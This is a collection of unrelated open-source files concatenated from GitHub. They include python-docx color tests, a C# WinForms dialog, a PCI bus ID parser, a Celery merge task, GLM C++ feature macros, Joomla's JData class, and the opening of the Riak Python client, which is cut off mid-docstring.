def it_can_change_its_RGB_value(self, rgb_set_fixture):
color_format, new_value, expected_xml = rgb_set_fixture
color_format.rgb = new_value
assert color_format._element.xml == expected_xml
def it_knows_its_theme_color(self, theme_color_get_fixture):
color_format, expected_value = theme_color_get_fixture
assert color_format.theme_color == expected_value
def it_can_change_its_theme_color(self, theme_color_set_fixture):
color_format, new_value, expected_xml = theme_color_set_fixture
color_format.theme_color = new_value
assert color_format._element.xml == expected_xml
# fixtures ---------------------------------------------
@pytest.fixture(params=[
('w:r', None),
('w:r/w:rPr', None),
('w:r/w:rPr/w:color{w:val=auto}', None),
('w:r/w:rPr/w:color{w:val=4224FF}', '4224ff'),
('w:r/w:rPr/w:color{w:val=auto,w:themeColor=accent1}', None),
('w:r/w:rPr/w:color{w:val=F00BA9,w:themeColor=accent1}', 'f00ba9'),
])
def rgb_get_fixture(self, request):
r_cxml, rgb = request.param
color_format = ColorFormat(element(r_cxml))
expected_value = None if rgb is None else RGBColor.from_string(rgb)
return color_format, expected_value
@pytest.fixture(params=[
('w:r', RGBColor(10, 20, 30), 'w:r/w:rPr/w:color{w:val=0A141E}'),
('w:r/w:rPr', RGBColor(1, 2, 3), 'w:r/w:rPr/w:color{w:val=010203}'),
('w:r/w:rPr/w:color{w:val=123abc}', RGBColor(42, 24, 99),
'w:r/w:rPr/w:color{w:val=2A1863}'),
('w:r/w:rPr/w:color{w:val=auto}', RGBColor(16, 17, 18),
'w:r/w:rPr/w:color{w:val=101112}'),
('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}',
RGBColor(24, 42, 99), 'w:r/w:rPr/w:color{w:val=182A63}'),
('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}',
None, 'w:r/w:rPr'),
('w:r', None, 'w:r'),
])
def rgb_set_fixture(self, request):
r_cxml, new_value, expected_cxml = request.param
color_format = ColorFormat(element(r_cxml))
expected_xml = xml(expected_cxml)
return color_format, new_value, expected_xml
@pytest.fixture(params=[
('w:r', None),
('w:r/w:rPr', None),
('w:r/w:rPr/w:color{w:val=auto}', None),
('w:r/w:rPr/w:color{w:val=4224FF}', None),
('w:r/w:rPr/w:color{w:themeColor=accent1}', 'ACCENT_1'),
('w:r/w:rPr/w:color{w:val=F00BA9,w:themeColor=dark1}', 'DARK_1'),
])
def theme_color_get_fixture(self, request):
r_cxml, value = request.param
color_format = ColorFormat(element(r_cxml))
expected_value = (
None if value is None else getattr(MSO_THEME_COLOR, value)
)
return color_format, expected_value
@pytest.fixture(params=[
('w:r', 'ACCENT_1',
'w:r/w:rPr/w:color{w:val=000000,w:themeColor=accent1}'),
('w:r/w:rPr', 'ACCENT_2',
'w:r/w:rPr/w:color{w:val=000000,w:themeColor=accent2}'),
('w:r/w:rPr/w:color{w:val=101112}', 'ACCENT_3',
'w:r/w:rPr/w:color{w:val=101112,w:themeColor=accent3}'),
('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}', 'LIGHT_2',
'w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=light2}'),
('w:r/w:rPr/w:color{w:val=234bcd,w:themeColor=dark1}', None,
'w:r/w:rPr'),
('w:r', None, 'w:r'),
])
def theme_color_set_fixture(self, request):
r_cxml, member, expected_cxml = request.param
color_format = ColorFormat(element(r_cxml))
new_value = (
None if member is None else getattr(MSO_THEME_COLOR, member)
)
expected_xml = xml(expected_cxml)
return color_format, new_value, expected_xml
@pytest.fixture(params=[
('w:r', None),
('w:r/w:rPr', None),
('w:r/w:rPr/w:color{w:val=auto}', MSO_COLOR_TYPE.AUTO),
('w:r/w:rPr/w:color{w:val=4224FF}', MSO_COLOR_TYPE.RGB),
('w:r/w:rPr/w:color{w:themeColor=dark1}', MSO_COLOR_TYPE.THEME),
('w:r/w:rPr/w:color{w:val=F00BA9,w:themeColor=accent1}',
MSO_COLOR_TYPE.THEME),
])
def type_fixture(self, request):
r_cxml, expected_value = request.param
color_format = ColorFormat(element(r_cxml))
return color_format, expected_value
| {
"pile_set_name": "Github"
} |
namespace Kuriimu
{
partial class Name
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;
/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}
#region Windows Form Designer generated code
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.lblName = new System.Windows.Forms.Label();
this.txtName = new System.Windows.Forms.TextBox();
this.btnOK = new System.Windows.Forms.Button();
this.btnCancel = new System.Windows.Forms.Button();
this.SuspendLayout();
//
// lblName
//
this.lblName.Font = new System.Drawing.Font("Microsoft Sans Serif", 9.75F);
this.lblName.Location = new System.Drawing.Point(8, 10);
this.lblName.Name = "lblName";
this.lblName.Size = new System.Drawing.Size(90, 22);
this.lblName.TabIndex = 0;
this.lblName.Text = "Name:";
this.lblName.TextAlign = System.Drawing.ContentAlignment.MiddleRight;
//
// txtName
//
this.txtName.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.txtName.Location = new System.Drawing.Point(104, 12);
this.txtName.Name = "txtName";
this.txtName.Size = new System.Drawing.Size(221, 20);
this.txtName.TabIndex = 1;
//
// btnOK
//
this.btnOK.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
this.btnOK.Location = new System.Drawing.Point(234, 43);
this.btnOK.Name = "btnOK";
this.btnOK.Size = new System.Drawing.Size(75, 23);
this.btnOK.TabIndex = 2;
this.btnOK.Text = "OK";
this.btnOK.UseVisualStyleBackColor = true;
this.btnOK.Click += new System.EventHandler(this.btnOK_Click);
//
// btnCancel
//
this.btnCancel.Anchor = ((System.Windows.Forms.AnchorStyles)((System.Windows.Forms.AnchorStyles.Bottom | System.Windows.Forms.AnchorStyles.Right)));
this.btnCancel.Location = new System.Drawing.Point(315, 43);
this.btnCancel.Name = "btnCancel";
this.btnCancel.Size = new System.Drawing.Size(75, 23);
this.btnCancel.TabIndex = 3;
this.btnCancel.Text = "Cancel";
this.btnCancel.UseVisualStyleBackColor = true;
this.btnCancel.Click += new System.EventHandler(this.btnCancel_Click);
//
// Name
//
this.AcceptButton = this.btnOK;
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.CancelButton = this.btnCancel;
this.ClientSize = new System.Drawing.Size(396, 73);
this.Controls.Add(this.btnCancel);
this.Controls.Add(this.btnOK);
this.Controls.Add(this.txtName);
this.Controls.Add(this.lblName);
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = "Name";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
this.Text = "Name";
this.Load += new System.EventHandler(this.Name_Load);
this.ResumeLayout(false);
this.PerformLayout();
}
#endregion
private System.Windows.Forms.Label lblName;
private System.Windows.Forms.TextBox txtName;
private System.Windows.Forms.Button btnOK;
private System.Windows.Forms.Button btnCancel;
}
} | {
"pile_set_name": "Github"
} |
using System;
using System.Linq;
namespace NHM.DeviceDetection.WMI
{
internal class DeviceBusData
{
public string Antecedent { get; set; }
public string Dependent { get; set; }
public int GetPCIBusID()
{
try
{
var pciBusStart = Antecedent.Substring(Antecedent.IndexOf("PCI"));
var pciBusIDStr = pciBusStart
.Split('\\')
.Where(part => part.Contains("PCI_BUS"))
.Select(part => part.Replace("PCI_BUS", "").Trim('\\', '_', '"'))
.FirstOrDefault();
if (int.TryParse(pciBusIDStr, out var pciBusID))
{
return pciBusID;
}
}
catch (Exception)
{
//throw;
}
return -1;
}
}
}
| {
"pile_set_name": "Github"
} |
from collections import Counter
from django_db_geventpool.utils import close_connection
from mygpo.podcasts.models import Podcast
from mygpo.celery import celery
from mygpo.maintenance.merge import PodcastMerger
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
@celery.task
@close_connection
def merge_podcasts(podcast_ids, num_groups):
""" Task to merge some podcasts"""
logger.info('merging podcast ids %s', podcast_ids)
podcasts = list(Podcast.objects.filter(id__in=podcast_ids))
logger.info('merging podcasts %s', podcasts)
actions = Counter()
pm = PodcastMerger(podcasts, actions, num_groups)
podcast = pm.merge()
logger.info('merging result: %s', actions)
return actions, podcast
| {
"pile_set_name": "Github"
} |
/// @ref core
/// @file glm/detail/_features.hpp
#pragma once
// #define GLM_CXX98_EXCEPTIONS
// #define GLM_CXX98_RTTI
// #define GLM_CXX11_RVALUE_REFERENCES
// Rvalue references - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n2118.html
// GLM_CXX11_TRAILING_RETURN
// Rvalue references for *this - GCC not supported
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2439.htm
// GLM_CXX11_NONSTATIC_MEMBER_INIT
// Initialization of class objects by rvalues - GCC any
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1610.html
// GLM_CXX11_NONSTATIC_MEMBER_INIT
// Non-static data member initializers - GCC 4.7
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2008/n2756.htm
// #define GLM_CXX11_VARIADIC_TEMPLATE
// Variadic templates - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2242.pdf
//
// Extending variadic template template parameters - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2555.pdf
// #define GLM_CXX11_GENERALIZED_INITIALIZERS
// Initializer lists - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2672.htm
// #define GLM_CXX11_STATIC_ASSERT
// Static assertions - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1720.html
// #define GLM_CXX11_AUTO_TYPE
// auto-typed variables - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1984.pdf
// #define GLM_CXX11_AUTO_TYPE
// Multi-declarator auto - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1737.pdf
// #define GLM_CXX11_AUTO_TYPE
// Removal of auto as a storage-class specifier - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2546.htm
// #define GLM_CXX11_AUTO_TYPE
// New function declarator syntax - GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2541.htm
// #define GLM_CXX11_LAMBDAS
// New wording for C++0x lambdas - GCC 4.5
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2009/n2927.pdf
// #define GLM_CXX11_DECLTYPE
// Declared type of an expression - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2343.pdf
//
// Right angle brackets - GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1757.html
//
// Default template arguments for function templates DR226 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/cwg_defects.html#226
//
// Solving the SFINAE problem for expressions DR339 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2634.html
// #define GLM_CXX11_ALIAS_TEMPLATE
// Template aliases N2258 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2258.pdf
//
// Extern templates N1987 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1987.htm
// #define GLM_CXX11_NULLPTR
// Null pointer constant N2431 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2431.pdf
// #define GLM_CXX11_STRONG_ENUMS
// Strongly-typed enums N2347 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2347.pdf
//
// Forward declarations for enums N2764 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2764.pdf
//
// Generalized attributes N2761 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2761.pdf
//
// Generalized constant expressions N2235 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2235.pdf
//
// Alignment support N2341 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2341.pdf
// #define GLM_CXX11_DELEGATING_CONSTRUCTORS
// Delegating constructors N1986 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1986.pdf
//
// Inheriting constructors N2540 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2540.htm
// #define GLM_CXX11_EXPLICIT_CONVERSIONS
// Explicit conversion operators N2437 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2437.pdf
//
// New character types N2249 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2249.html
//
// Unicode string literals N2442 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2442.htm
//
// Raw string literals N2442 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2442.htm
//
// Universal character name literals N2170 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2170.html
// #define GLM_CXX11_USER_LITERALS
// User-defined literals N2765 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2765.pdf
//
// Standard Layout Types N2342 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2342.htm
// #define GLM_CXX11_DEFAULTED_FUNCTIONS
// #define GLM_CXX11_DELETED_FUNCTIONS
// Defaulted and deleted functions N2346 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2346.htm
//
// Extended friend declarations N1791 GCC 4.7
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1791.pdf
//
// Extending sizeof N2253 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2253.html
// #define GLM_CXX11_INLINE_NAMESPACES
// Inline namespaces N2535 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2535.htm
// #define GLM_CXX11_UNRESTRICTED_UNIONS
// Unrestricted unions N2544 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2544.pdf
// #define GLM_CXX11_LOCAL_TYPE_TEMPLATE_ARGS
// Local and unnamed types as template arguments N2657 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2657.htm
// #define GLM_CXX11_RANGE_FOR
// Range-based for N2930 GCC 4.6
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2009/n2930.html
// #define GLM_CXX11_OVERRIDE_CONTROL
// Explicit virtual overrides N2928 N3206 N3272 GCC 4.7
// http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2009/n2928.htm
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3206.htm
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2011/n3272.htm
//
// Minimal support for garbage collection and reachability-based leak detection N2670 No
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2670.htm
// #define GLM_CXX11_NOEXCEPT
// Allowing move constructors to throw [noexcept] N3050 GCC 4.6 (core language only)
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3050.html
//
// Defining move special member functions N3053 GCC 4.6
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2010/n3053.html
//
// Sequence points N2239 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2239.html
//
// Atomic operations N2427 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2239.html
//
// Strong Compare and Exchange N2748 GCC 4.5
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2427.html
//
// Bidirectional Fences N2752 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2752.htm
//
// Memory model N2429 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2429.htm
//
// Data-dependency ordering: atomics and memory model N2664 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2664.htm
//
// Propagating exceptions N2179 GCC 4.4
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2179.html
//
// Abandoning a process and at_quick_exit N2440 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2440.htm
//
// Allow atomics use in signal handlers N2547 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2547.htm
//
// Thread-local storage N2659 GCC 4.8
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2659.htm
//
// Dynamic initialization and destruction with concurrency N2660 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2008/n2660.htm
//
// __func__ predefined identifier N2340 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2340.htm
//
// C99 preprocessor N1653 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2004/n1653.htm
//
// long long N1811 GCC 4.3
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1811.pdf
//
// Extended integral types N1988 Yes
// http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2006/n1988.pdf
#if(GLM_COMPILER & GLM_COMPILER_GCC)
# define GLM_CXX11_STATIC_ASSERT
#elif(GLM_COMPILER & GLM_COMPILER_CLANG)
# if(__has_feature(cxx_exceptions))
# define GLM_CXX98_EXCEPTIONS
# endif
# if(__has_feature(cxx_rtti))
# define GLM_CXX98_RTTI
# endif
# if(__has_feature(cxx_access_control_sfinae))
# define GLM_CXX11_ACCESS_CONTROL_SFINAE
# endif
# if(__has_feature(cxx_alias_templates))
# define GLM_CXX11_ALIAS_TEMPLATE
# endif
# if(__has_feature(cxx_alignas))
# define GLM_CXX11_ALIGNAS
# endif
# if(__has_feature(cxx_attributes))
# define GLM_CXX11_ATTRIBUTES
# endif
# if(__has_feature(cxx_constexpr))
# define GLM_CXX11_CONSTEXPR
# endif
# if(__has_feature(cxx_decltype))
# define GLM_CXX11_DECLTYPE
# endif
# if(__has_feature(cxx_default_function_template_args))
# define GLM_CXX11_DEFAULT_FUNCTION_TEMPLATE_ARGS
# endif
# if(__has_feature(cxx_defaulted_functions))
# define GLM_CXX11_DEFAULTED_FUNCTIONS
# endif
# if(__has_feature(cxx_delegating_constructors))
# define GLM_CXX11_DELEGATING_CONSTRUCTORS
# endif
# if(__has_feature(cxx_deleted_functions))
# define GLM_CXX11_DELETED_FUNCTIONS
# endif
# if(__has_feature(cxx_explicit_conversions))
# define GLM_CXX11_EXPLICIT_CONVERSIONS
# endif
# if(__has_feature(cxx_generalized_initializers))
# define GLM_CXX11_GENERALIZED_INITIALIZERS
# endif
# if(__has_feature(cxx_implicit_moves))
# define GLM_CXX11_IMPLICIT_MOVES
# endif
# if(__has_feature(cxx_inheriting_constructors))
# define GLM_CXX11_INHERITING_CONSTRUCTORS
# endif
# if(__has_feature(cxx_inline_namespaces))
# define GLM_CXX11_INLINE_NAMESPACES
# endif
# if(__has_feature(cxx_lambdas))
# define GLM_CXX11_LAMBDAS
# endif
# if(__has_feature(cxx_local_type_template_args))
# define GLM_CXX11_LOCAL_TYPE_TEMPLATE_ARGS
# endif
# if(__has_feature(cxx_noexcept))
# define GLM_CXX11_NOEXCEPT
# endif
# if(__has_feature(cxx_nonstatic_member_init))
# define GLM_CXX11_NONSTATIC_MEMBER_INIT
# endif
# if(__has_feature(cxx_nullptr))
# define GLM_CXX11_NULLPTR
# endif
# if(__has_feature(cxx_override_control))
# define GLM_CXX11_OVERRIDE_CONTROL
# endif
# if(__has_feature(cxx_reference_qualified_functions))
# define GLM_CXX11_REFERENCE_QUALIFIED_FUNCTIONS
# endif
# if(__has_feature(cxx_range_for))
# define GLM_CXX11_RANGE_FOR
# endif
# if(__has_feature(cxx_raw_string_literals))
# define GLM_CXX11_RAW_STRING_LITERALS
# endif
# if(__has_feature(cxx_rvalue_references))
# define GLM_CXX11_RVALUE_REFERENCES
# endif
# if(__has_feature(cxx_static_assert))
# define GLM_CXX11_STATIC_ASSERT
# endif
# if(__has_feature(cxx_auto_type))
# define GLM_CXX11_AUTO_TYPE
# endif
# if(__has_feature(cxx_strong_enums))
# define GLM_CXX11_STRONG_ENUMS
# endif
# if(__has_feature(cxx_trailing_return))
# define GLM_CXX11_TRAILING_RETURN
# endif
# if(__has_feature(cxx_unicode_literals))
# define GLM_CXX11_UNICODE_LITERALS
# endif
# if(__has_feature(cxx_unrestricted_unions))
# define GLM_CXX11_UNRESTRICTED_UNIONS
# endif
# if(__has_feature(cxx_user_literals))
# define GLM_CXX11_USER_LITERALS
# endif
# if(__has_feature(cxx_variadic_templates))
# define GLM_CXX11_VARIADIC_TEMPLATES
# endif
#endif//(GLM_COMPILER & GLM_COMPILER_CLANG)
| {
"pile_set_name": "Github"
} |
cairo-gobject
gtk4
| {
"pile_set_name": "Github"
} |
<?php
/**
* @package Joomla.Platform
* @subpackage Data
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
defined('JPATH_PLATFORM') or die;
use Joomla\Registry\Registry;
/**
* JData is a class that is used to store data but allowing you to access the data
* by mimicking the way PHP handles class properties.
*
* @since 12.3
*/
class JData implements JDataDumpable, IteratorAggregate, JsonSerializable, Countable
{
/**
* The data properties.
*
* @var array
* @since 12.3
*/
private $_properties = array();
/**
* The class constructor.
*
* @param mixed $properties Either an associative array or another object
* by which to set the initial properties of the new object.
*
* @since 12.3
* @throws InvalidArgumentException
*/
public function __construct($properties = array())
{
// Check the properties input.
if (!empty($properties))
{
// Bind the properties.
$this->bind($properties);
}
}
/**
* The magic get method is used to get a data property.
*
* This method is a public proxy for the protected getProperty method.
*
* Note: Magic __get does not allow recursive calls. This can be tricky because the error generated by recursing into
* __get is "Undefined property: {CLASS}::{PROPERTY}" which is misleading. This is relevant for this class because
* requesting a non-visible property can trigger a call to a sub-function. If that references the property directly in
* the object, it will cause a recursion into __get.
*
* @param string $property The name of the data property.
*
* @return mixed The value of the data property, or null if the data property does not exist.
*
* @see JData::getProperty()
* @since 12.3
*/
public function __get($property)
{
return $this->getProperty($property);
}
/**
* The magic isset method is used to check the state of an object property.
*
* @param string $property The name of the data property.
*
* @return boolean True if set, otherwise false is returned.
*
* @since 12.3
*/
public function __isset($property)
{
return isset($this->_properties[$property]);
}
/**
* The magic set method is used to set a data property.
*
* This is a public proxy for the protected setProperty method.
*
* @param string $property The name of the data property.
* @param mixed $value The value to give the data property.
*
* @return void
*
* @see JData::setProperty()
* @since 12.3
*/
public function __set($property, $value)
{
$this->setProperty($property, $value);
}
/**
* The magic unset method is used to unset a data property.
*
* @param string $property The name of the data property.
*
* @return void
*
* @since 12.3
*/
public function __unset($property)
{
unset($this->_properties[$property]);
}
/**
* Binds an array or object to this object.
*
* @param mixed $properties An associative array of properties or an object.
* @param boolean $updateNulls True to bind null values, false to ignore null values.
*
* @return JData Returns itself to allow chaining.
*
* @since 12.3
* @throws InvalidArgumentException
*/
public function bind($properties, $updateNulls = true)
{
// Check the properties data type.
if (!is_array($properties) && !is_object($properties))
{
throw new InvalidArgumentException(sprintf('%s(%s)', __METHOD__, gettype($properties)));
}
// Check if the object is traversable.
if ($properties instanceof Traversable)
{
// Convert iterator to array.
$properties = iterator_to_array($properties);
}
// Check if the object needs to be converted to an array.
elseif (is_object($properties))
{
// Convert properties to an array.
$properties = (array) $properties;
}
// Bind the properties.
foreach ($properties as $property => $value)
{
// Check if the value is null and should be bound.
if ($value === null && !$updateNulls)
{
continue;
}
// Set the property.
$this->setProperty($property, $value);
}
return $this;
}
/**
* Dumps the data properties into a stdClass object, recursively if appropriate.
*
* @param integer $depth The maximum depth of recursion (default = 3).
* For example, a depth of 0 will return a stdClass with all the properties in native
* form. A depth of 1 will recurse into the first level of properties only.
* @param SplObjectStorage $dumped An array of already serialized objects that is used to avoid infinite loops.
*
* @return stdClass The data properties as a simple PHP stdClass object.
*
* @since 12.3
*/
public function dump($depth = 3, SplObjectStorage $dumped = null)
{
// Check if we should initialise the recursion tracker.
if ($dumped === null)
{
$dumped = new SplObjectStorage;
}
// Add this object to the dumped stack.
$dumped->attach($this);
// Setup a container.
$dump = new stdClass;
// Dump all object properties.
foreach (array_keys($this->_properties) as $property)
{
// Get the property.
$dump->$property = $this->dumpProperty($property, $depth, $dumped);
}
return $dump;
}
/**
* Gets this object represented as an ArrayIterator.
*
* This allows the data properties to be access via a foreach statement.
*
* @return ArrayIterator This object represented as an ArrayIterator.
*
* @see IteratorAggregate::getIterator()
* @since 12.3
*/
public function getIterator()
{
return new ArrayIterator($this->dump(0));
}
/**
* Gets the data properties in a form that can be serialised to JSON format.
*
* @return string An object that can be serialised by json_encode().
*
* @since 12.3
*/
public function jsonSerialize()
{
return $this->dump();
}
/**
* Dumps a data property.
*
* If recursion is set, this method will dump any object implementing JDumpable (like JData and JDataSet); it will
* convert a JDate object to a string; and it will convert a Registry to an object.
*
* @param string $property The name of the data property.
* @param integer $depth The current depth of recursion (a value of 0 will ignore recursion).
* @param SplObjectStorage $dumped An array of already serialized objects that is used to avoid infinite loops.
*
* @return mixed The value of the dumped property.
*
* @since 12.3
*/
protected function dumpProperty($property, $depth, SplObjectStorage $dumped)
{
$value = $this->getProperty($property);
if ($depth > 0)
{
// Check if the object is also an dumpable object.
if ($value instanceof JDataDumpable)
{
// Do not dump the property if it has already been dumped.
if (!$dumped->contains($value))
{
$value = $value->dump($depth - 1, $dumped);
}
}
// Check if the object is a date.
if ($value instanceof JDate)
{
$value = (string) $value;
}
// Check if the object is a registry.
elseif ($value instanceof Registry)
{
$value = $value->toObject();
}
}
return $value;
}
/**
* Gets a data property.
*
* @param string $property The name of the data property.
*
* @return mixed The value of the data property.
*
* @see JData::__get()
* @since 12.3
*/
protected function getProperty($property)
{
// Get the raw value.
$value = array_key_exists($property, $this->_properties) ? $this->_properties[$property] : null;
return $value;
}
/**
* Sets a data property.
*
* If the name of the property starts with a null byte, this method will return null.
*
* @param string $property The name of the data property.
* @param mixed $value The value to give the data property.
*
* @return mixed The value of the data property.
*
* @see JData::__set()
* @since 12.3
*/
protected function setProperty($property, $value)
{
/*
* Check if the property starts with a null byte. If so, discard it because a later attempt to try to access it
* can cause a fatal error. See http://us3.php.net/manual/en/language.types.array.php#language.types.array.casting
*/
if (strpos($property, "\0") === 0)
{
return null;
}
// Set the value.
$this->_properties[$property] = $value;
return $value;
}
/**
* Count the number of data properties.
*
* @return integer The number of data properties.
*
* @since 12.3
*/
public function count()
{
return count($this->_properties);
}
}
| {
"pile_set_name": "Github"
} |
# Copyright 2010-present Basho Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import simplejson as json
except ImportError:
import json
import random
from weakref import WeakValueDictionary
from riak.client.operations import RiakClientOperations
from riak.node import RiakNode
from riak.bucket import RiakBucket, BucketType
from riak.mapreduce import RiakMapReduceChain
from riak.resolver import default_resolver
from riak.table import Table
from riak.transports.http import HttpPool
from riak.transports.tcp import TcpPool
from riak.security import SecurityCreds
from riak.util import lazy_property, bytes_to_str, str_to_bytes
from six import string_types, PY2
from riak.client.multi import MultiGetPool, MultiPutPool
def default_encoder(obj):
"""
Default encoder for JSON datatypes, which returns UTF-8 encoded
json instead of the default bloated backslash u XXXX escaped ASCII strings.
"""
if isinstance(obj, bytes):
return json.dumps(bytes_to_str(obj),
ensure_ascii=False).encode("utf-8")
else:
return json.dumps(obj, ensure_ascii=False).encode("utf-8")
def binary_json_encoder(obj):
"""
Default encoder for JSON datatypes, which returns UTF-8 encoded
json instead of the default bloated backslash u XXXX escaped ASCII strings.
"""
if isinstance(obj, bytes):
return json.dumps(bytes_to_str(obj),
ensure_ascii=False).encode("utf-8")
else:
return json.dumps(obj, ensure_ascii=False).encode("utf-8")
def binary_json_decoder(obj):
"""
Default decoder from JSON datatypes.
"""
return json.loads(bytes_to_str(obj))
def binary_encoder_decoder(obj):
"""
Assumes value is already in binary format, so passes unchanged.
"""
return obj
class RiakClient(RiakMapReduceChain, RiakClientOperations):
"""
The ``RiakClient`` object holds information necessary to connect
to Riak. Requests can be made to Riak directly through the client
or by using the methods on related objects.
"""
#: The supported protocols
PROTOCOLS = ['http', 'pbc']
def __init__(self, protocol='pbc', transport_options={},
nodes=None, credentials=None,
multiget_pool_size=None, multiput_pool_size=None,
**kwargs):
"""
Construct a new ``RiakClient`` object.
:param protocol: the preferred protocol, defaults to 'pbc'
:type protocol: string
:param nodes: a list of node configurations,
where each configuration is a dict containing the keys
'host', 'http_port', and 'pb_port'
:type nodes: list
:param transport_options: Optional key-value args to pass to
the transport constructor
:type transport_options: dict
:param credentials: optional object of security info
:type credentials: :class:`~riak.security.SecurityCreds` or dict
:param multiget_pool_size: the number of threads to use in
:meth:`multiget` operations. Defaults to a factor of the number of
CPUs in the system
:type multiget_pool_size: int
:param multiput_pool_size: the number of threads to use in
